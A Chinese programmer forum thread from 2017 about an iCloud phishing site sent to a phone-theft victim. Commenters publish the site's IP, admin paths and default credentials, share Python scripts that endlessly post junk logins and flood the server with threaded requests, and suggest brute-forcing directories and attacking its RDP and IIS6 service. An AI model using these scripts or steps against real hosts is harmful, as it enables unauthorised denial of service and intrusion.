V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
pudgeee
V2EX  ›  程序员

搞搞这帮小贼。。。

  •  
  •   pudgeee · 2017-01-08 14:47:18 +08:00 · 11187 次点击
    这是一个创建于 2861 天前的主题,其中的信息可能已经有所发展或是发生改变。
    女票手机昨儿被偷了,气愤中。。。今天骗子给我发诈骗账号密码的短信,里面有个伪装 icloud 页面的的链接
    http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ
    看了他的源码,如果真有人输入帐号密码了,会把信息 post 到 ../IPASS.asp , 无奈,后面就不知道怎么搞了,希望大家都来瞅瞅,有空的一起搞搞啊。。
    81 条回复    2017-03-11 22:57:15 +08:00
    goodniuniu
        1
    goodniuniu  
       2017-01-08 14:59:45 +08:00 via iPhone
    这些网站不需要备案的吗
    pudgeee
        2
    pudgeee  
    OP
       2017-01-08 15:07:01 +08:00
    @goodniuniu 不知道啊,不过刚才查了下,没有备案信息。。。。。。
    hst001
        3
    hst001  
       2017-01-08 15:10:34 +08:00   ❤️ 1
    如果你不知道怎么搞,就试着写个脚本提几十万垃圾数据到他们数据库
    stillwaiting
        4
    stillwaiting  
       2017-01-08 15:11:23 +08:00
    @goodniuniu 大陆地区才有备案一说。。。
    daolin998
        5
    daolin998  
       2017-01-08 15:19:06 +08:00
    @stillwaiting 关键是这个是 CN 域名啊。。。
    Wins0n
        6
    Wins0n  
       2017-01-08 15:29:31 +08:00   ❤️ 1
    昨天在新网注册的域名,服务器在香港,没有备案信息, QQ 应该是小号。

    ```
    所有者 蒋立平
    Registrant Name

    所有者联系邮箱 [email protected]
    Registrant E-mail

    注册商 北京新网数码信息技术有限公司
    Sponsoring Registrar

    注册日期 2017 年 01 月 07 日
    Registration Date(UTC+08:00)

    到期日期 2018 年 01 月 07 日
    Expiration Date(UTC+08:00)

    · 此域名到期日仅供参考。实际到期日期请咨询其注册商。
    · 如未在实际到期日期前续费,将导致域名使用异常,如网站无法访问等。

    域名状态
    Domain Status 正常状态( ok )

    DNS 服务器
    Name Server DNS1 : ns11.xincache.com
    DNS2 : ns12.xincache.com

    118.184.45.161
    香港 安畅网络(亚太)有限公司沙田数据中心(沙田火炭黃竹洋街 8 号新鴻基物流中心 3 楼)
    ```
    shiny
        7
    shiny  
       2017-01-08 15:30:11 +08:00 via iPhone
    @daolin998 cncn 域名也可以不备案解析的。

    这种网站可以去举报。
    irainsoft
        8
    irainsoft  
       2017-01-08 15:33:26 +08:00
    cn 域名是要实名注册的 不过这资料应该拿不到的...
    xfspace
        9
    xfspace  
       2017-01-08 15:33:46 +08:00 via iPad
    瓜子汽水鸡块辣条
    小板凳
    ianzhou233
        10
    ianzhou233  
       2017-01-08 15:35:37 +08:00 via Android
    cn 要备案,所以就弃了
    feather12315
        11
    feather12315  
       2017-01-08 15:36:48 +08:00 via Android
    关了。 DNS 解析去掉了
    feather12315
        12
    feather12315  
       2017-01-08 15:37:23 +08:00 via Android
    …@feather12315
    我的错,没关
    lynnworld
        13
    lynnworld  
       2017-01-08 15:38:36 +08:00
    整个上千万的数据,撑死他的服务器
    ic2y
        14
    ic2y  
       2017-01-08 15:40:29 +08:00
    看看这个 url http://www.apple-icloudc.cn/backup/

    结果是 403 啊,说明目录存在,很有搞头,谁去用工具爆破一下这个目录。。。

    而且是用 《逆风工作室 Netbox v3.0 201005 》 做的。。看看有没有什么漏洞
    MrMario
        15
    MrMario  
       2017-01-08 16:31:54 +08:00 via iPhone
    欢迎去阿里 110 举报,避免他人财产损失
    Showfom
        16
    Showfom  
       2017-01-08 16:39:13 +08:00 via iPhone
    @daolin998 cn 域名不用国内的主机不需要备案
    devzero
        17
    devzero  
       2017-01-08 16:54:32 +08:00 via Android
    记得有个帖子说也是遇到这种,然后他就写了个脚本 post 一堆垃圾数据,还扫描到了 100 多个同类型的网站,之后就忘了
    我也遇到类似的盗号的,我的做法是往那个页面发十万还是一百万( 0 没得数 XD )条垃圾信息,结果第二天就关站了
    wlh233
        18
    wlh233  
       2017-01-08 17:01:21 +08:00
    后台 http://www.apple-icloudc.cn/manager/

    然后搜了一下所谓紫缘管理系统,应该是专门做钓鱼网站的
    flyfishcn
        20
    flyfishcn  
       2017-01-08 17:05:33 +08:00
    @daolin998 备案是接入环节的事情,域名本身无备案的说法。虽然确实叫域名备案,实际审核的是接入服务提供商
    dikT
        21
    dikT  
       2017-01-08 17:23:19 +08:00   ❤️ 1
    # language: python


    def post():
    url = 'http://www.apple-icloudc.cn/IPASS.asp'
    data = dict(sjname=123,
    sjpass=123,
    submit='登录')
    headers = {'Cookie': 'PWSBMJSDSUIPPUOMDATL=OXVIFWPVJALCSXQNBGYOKCMAUQLNROTEDYSJIMEY',
    'Origin': 'http://www.apple-icloudc.cn',
    'Referer':'http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ',
    }
    req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), headers=headers)
    page = urllib.request.urlopen(req).read().decode('gbk')
    print(page)
    dikT
        22
    dikT  
       2017-01-08 17:24:50 +08:00
    def post():
    url = 'http://www.apple-icloudc.cn/IPASS.asp'
    headers = {'Cookie': 'PWSBMJSDSUIPPUOMDATL=OXVIFWPVJALCSXQNBGYOKCMAUQLNROTEDYSJIMEY',
    'Origin': 'http://www.apple-icloudc.cn',
    'Referer':'http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ',
    }
    i = 0
    while 1:
    i += 1
    data = dict(sjname=i,
    sjpass=i,
    submit='登录')
    req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), headers=headers)
    page = urllib.request.urlopen(req).read().decode('gbk')
    print(page)

    if __name__ == '__main__':
    post()
    dikT
        23
    dikT  
       2017-01-08 17:35:28 +08:00
    怎么就被搞挂了....
    hrong
        24
    hrong  
       2017-01-08 17:35:51 +08:00 via Android
    这个网站现在已经没法访问了。
    timothyye
        25
    timothyye  
       2017-01-08 17:48:00 +08:00 via Android
    哈哈,程序员不好惹
    ericbize
        26
    ericbize  
       2017-01-08 18:03:32 +08:00
    好像,那个网站有 cdn , 跑死了就没戏了,慢慢跑,跑流量 1T 300 元,可以跑到小贼破产啊 ~~~~

    import urllib
    import urllib2
    import threading
    import time

    print 'ctrl and z stop the program'
    thr=input("how many thread do you need : (the thread should be lower then 10 , otherwise gg)")
    cycle=input ("how many cycle do you need : ")
    address= raw_input("plaese input the address")
    start = time.clock()

    def printf(i):
    for x in xrange(cycle):
    down(x)
    end = time.clock()
    print ' ' + 'T' + i + " " +"using: %f s" % (end - start)


    def down(x):
    url = (address)
    d=urllib2.urlopen(url)
    data = d.read()
    print x,

    def test():
    thread_list = []
    for i in xrange(thr):
    sthread = threading.Thread(target = printf, args = str(i))
    sthread.start()
    thread_list.append(sthread)

    if __name__ == '__main__':
    test()
    wudaonongjian
        27
    wudaonongjian  
       2017-01-08 18:09:24 +08:00
    @wlh233 紫缘是专门做钓鱼网站卖给别人的,几年前的 qq 钓鱼网站也是他们的杰作
    LGA1150
        28
    LGA1150  
       2017-01-08 18:37:07 +08:00
    @dikT
    @hrong
    停止解析了,不过还可以通过原 IP 118.184.45.161 继续 POST
    roist
        29
    roist  
       2017-01-08 18:43:51 +08:00
    据相关报道称,这个紫缘的作者早被抓了?
    vizards
        30
    vizards  
       2017-01-08 18:44:03 +08:00
    取消解析了而已,源站 ip 118.184.45.161 ,后台管理 http://118.184.45.161/manager/
    assassinpig
        31
    assassinpig  
       2017-01-08 18:48:52 +08:00   ❤️ 1
    http://118.184.45.161/backup/
    assassinpig
        32
    assassinpig  
       2017-01-08 18:52:26 +08:00
    @vizards 你真快
    admin
    admin
    admin
    assassinpig
        33
    assassinpig  
       2017-01-08 18:54:25 +08:00
    @pudgeee
    http://118.184.45.161/manager/admin.asp
    Nitroethane
        34
    Nitroethane  
       2017-01-08 19:15:43 +08:00 via Android
    这个早就被人搞过了,某乎上相关文章
    ghostcir
        35
    ghostcir  
       2017-01-08 19:33:29 +08:00
    IP 是 51idc 的,去举报呗
    dzhlovecoding
        36
    dzhlovecoding  
       2017-01-08 19:38:45 +08:00 via iPhone
    为什么我手机端的 V2EX 不能发表主题
    Hihh
        37
    Hihh  
       2017-01-08 20:05:17 +08:00
    这应该是一条黑色产业链
    有人专门偷手机有人专门钓鱼
    这种钓鱼网站在手机浏览器比如 safari 是不会提示的,在 pc 上 360 会提示(之前上过当,输过密码,然后几个苹果设备的数据都被抹了。。
    feifan00x
        38
    feifan00x  
       2017-01-08 20:13:25 +08:00
    厉害了,表哥们
    hjlmjx
        39
    hjlmjx  
       2017-01-08 20:17:45 +08:00 via Android
    苹果手机都是这一套产业链。偶尔还会以假的苹果客服给你打电话。前面没有上海的区号。不行就发钓鱼信息,钓鱼邮件来骗取 appleid
    J0022ZjV7055oN64
        40
    J0022ZjV7055oN64  
       2017-01-08 20:35:26 +08:00
    @assassinpig 点击一次登陆 然后 重新访问这个地址就能进后台 是漏洞?
    ershiwo
        41
    ershiwo  
       2017-01-08 20:40:38 +08:00
    喂,已经被玩坏了!
    RobertYang
        42
    RobertYang  
       2017-01-08 20:42:27 +08:00 via Android
    沙田 上次有个骗子给我发短信,网站就是放沙田的,二话不说打了他 3 天,然后删站
    btjoker
        43
    btjoker  
       2017-01-08 20:42:56 +08:00
    完全挂掉了~
    J0022ZjV7055oN64
        44
    J0022ZjV7055oN64  
       2017-01-08 20:47:12 +08:00
    强 完全挂掉了
    JonyOang
        45
    JonyOang  
       2017-01-08 21:04:09 +08:00
    已经被玩儿坏
    pwcong
        46
    pwcong  
       2017-01-08 21:12:32 +08:00
    我错过了各位大佬的好戏
    157003892
        47
    157003892  
       2017-01-08 21:30:28 +08:00
    @LGA1150 死掉了。。
    sueslee
        48
    sueslee  
       2017-01-08 21:35:46 +08:00
    长时间不上当骗子会冒充客服打电话,如果是 qq 邮箱的话会加你的 qq
    renyiqiu
        49
    renyiqiu  
       2017-01-08 21:38:42 +08:00
    可啪
    stancaohua
        50
    stancaohua  
       2017-01-08 21:43:58 +08:00
    效率好快啊。。
    alibabamama
        51
    alibabamama  
       2017-01-08 22:49:08 +08:00
    点个赞
    mingyun
        52
    mingyun  
       2017-01-08 23:09:52 +08:00
    @dikT 厉害了,哥
    lovesan
        53
    lovesan  
       2017-01-08 23:27:17 +08:00
    好不容易找到个可以玩的 这么快就被玩坏了 你们不能温柔点么。。
    yuxuan
        54
    yuxuan  
       2017-01-08 23:37:38 +08:00
    来晚了 没得玩了
    truecho
        55
    truecho  
       2017-01-08 23:41:18 +08:00 via iPhone
    没得玩了
    vimffs
        56
    vimffs  
       2017-01-09 00:30:19 +08:00
    @Livid 以后对这类好玩的东西,期待能搞个订阅+邮件提醒功能。哈哈
    AlisaDestiny
        57
    AlisaDestiny  
       2017-01-09 01:29:48 +08:00
    我也想玩玩的。没想到已经被你们玩坏了。
    zjqzxc
        58
    zjqzxc  
       2017-01-09 08:11:41 +08:00
    并没有来晚,只是任务升级了

    服务器还活着,骗子应该是换了个域名绑定上接着骗其他人去了。
    $ curl -I 118.184.45.161
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    0 1193 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0HTTP/1.1 200 OK
    Content-Length: 1193
    Content-Type: text/html
    Content-Location: http://118.184.45.161/iisstart.htm
    Last-Modified: Fri, 21 Feb 2003 12:15:52 GMT
    Accept-Ranges: bytes
    ETag: "0ce1f9a2d9c21:c4e"
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Date: Mon, 09 Jan 2017 00:08:19 GMT

    不是做安全的并不清楚除了 dos/ddos 还能做啥,该怎么折腾楼下继续
    leisure
        59
    leisure  
       2017-01-09 08:17:19 +08:00
    你们玩儿得太快了吧。。。
    hbiboluo
        60
    hbiboluo  
       2017-01-09 08:50:11 +08:00
    干得漂亮!!!
    huiyue
        61
    huiyue  
       2017-01-09 09:27:15 +08:00   ❤️ 1
    118.184.45.161 , ping 了一下,速度还挺快。端口扫描,开放了 80 、 3389 端口。既然开放了 3389 远程桌面端口,远程上去先看一下,服务器是 Win server 2003 ,相信各种漏洞补丁打的可能性不高,那接下来就去网上找 3389 入侵案例咯。我相信他的用户名是 administrator 。接下里看楼主的了。
    LCD
        62
    LCD  
       2017-01-09 09:33:30 +08:00
    会不会连 IP 都更换了?
    YzSama
        63
    YzSama  
       2017-01-09 09:46:46 +08:00
    哈哈哈, 666666.
    惹怒了一群程序员..笑死我了
    fzhw88
        64
    fzhw88  
       2017-01-09 09:47:06 +08:00
    你们,哈哈哈~这种就应该狠狠的玩!
    lnkn
        65
    lnkn  
       2017-01-09 09:53:27 +08:00
    其实程序员才是真·黑客
    syhsyh9696
        66
    syhsyh9696  
       2017-01-09 10:17:29 +08:00
    应该 118.184.45.161 118.184.45.162 这两台都是属于这个骗子的,安装的操作系统都是一样的。
    pudgeee
        67
    pudgeee  
    OP
       2017-01-09 10:18:36 +08:00
    @assassinpig 多谢多谢。。
    @huiyue 多谢多谢。。 这就去看案例……
    @all 多谢各位了, 这肯定是一个黑色产业链,手机丢失后不到一天就进入诈骗环节,那说明小贼已经销赃完,说不准都往下走了几个环节了,说明这个流程很成熟,只是有些人不管罢了。。。 那。。。。 只能自食其力喽。。。
    wolfan
        68
    wolfan  
       2017-01-09 10:21:36 +08:00 via Android
    @daolin998 cn 域名不一定要备案,但买到后会有个实名审核的过程,反正我的全没备案,就只作了实名。
    pudgeee
        69
    pudgeee  
    OP
       2017-01-09 10:38:44 +08:00
    @Wins0n 已经按照你的信息 报沈阳市刑警指挥中心备案 多谢!
    via
        70
    via  
       2017-01-09 11:11:28 +08:00
    @wolfan 阿里云 cn 域名好像不需要备案也
    lepig
        71
    lepig  
       2017-01-09 11:24:03 +08:00
    楼上的禽兽 这么快就给玩完了
    16500682
        72
    16500682  
       2017-01-09 11:30:01 +08:00 via iPhone
    @via 不管哪里注册的 cn 域名都需要上传实名信(身份证照片等)息审核后才能解析
    tracymcladdy
        73
    tracymcladdy  
       2017-01-09 11:34:20 +08:00
    已经玩坏了啊。。
    hantsy
        74
    hantsy  
       2017-01-09 13:17:16 +08:00
    @pudgeee 最可怕的是某些人也参与了。。。
    Alonso
        75
    Alonso  
       2017-01-09 14:32:03 +08:00
    可怕-- !!!!!
    yivanus
        76
    yivanus  
       2017-01-09 17:43:32 +08:00
    登录不了。。谁知道服务器密码的?远程连接桌面,不知道密码。
    wintercoder
        77
    wintercoder  
       2017-01-09 23:16:13 +08:00
    你们太强了
    c0878
        78
    c0878  
       2017-01-09 23:19:30 +08:00
    早知道 V2EX 上大家这么厉害 去年丢手机时候也发上来让大家玩玩好了
    lslqtz
        79
    lslqtz  
       2017-01-10 05:29:08 +08:00
    iis6 各位可以试试看玩玩
    w88975
        80
    w88975  
       2017-01-10 15:15:31 +08:00
    看着大家玩的这么开心,我说一句吧.
    其实你们这样搞钓鱼网站,对他们没什么大影响,post 垃圾数据更是一点用都没有,我找到几个大量 post 的 ip,直接一个 sql 命令就删了,顺便把你 ip 封了.

    域名不值钱,一天换 10 个域名都挠痒痒
    至于 DDos,叫机房换个 ip 就行了,一天 500 块钱的成本对于钓鱼者来说,都是预算内.

    技术角度是打不倒钓鱼的,除非是根源切除整个产业链.
    snsd
        81
    snsd  
       2017-03-11 22:57:15 +08:00
    @huiyue 162 这个居然还在开机, mstsc 都还能连得上。只可惜不知道密码啊
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2525 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 28ms · UTC 01:26 · PVG 09:26 · LAX 17:26 · JFK 20:26
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.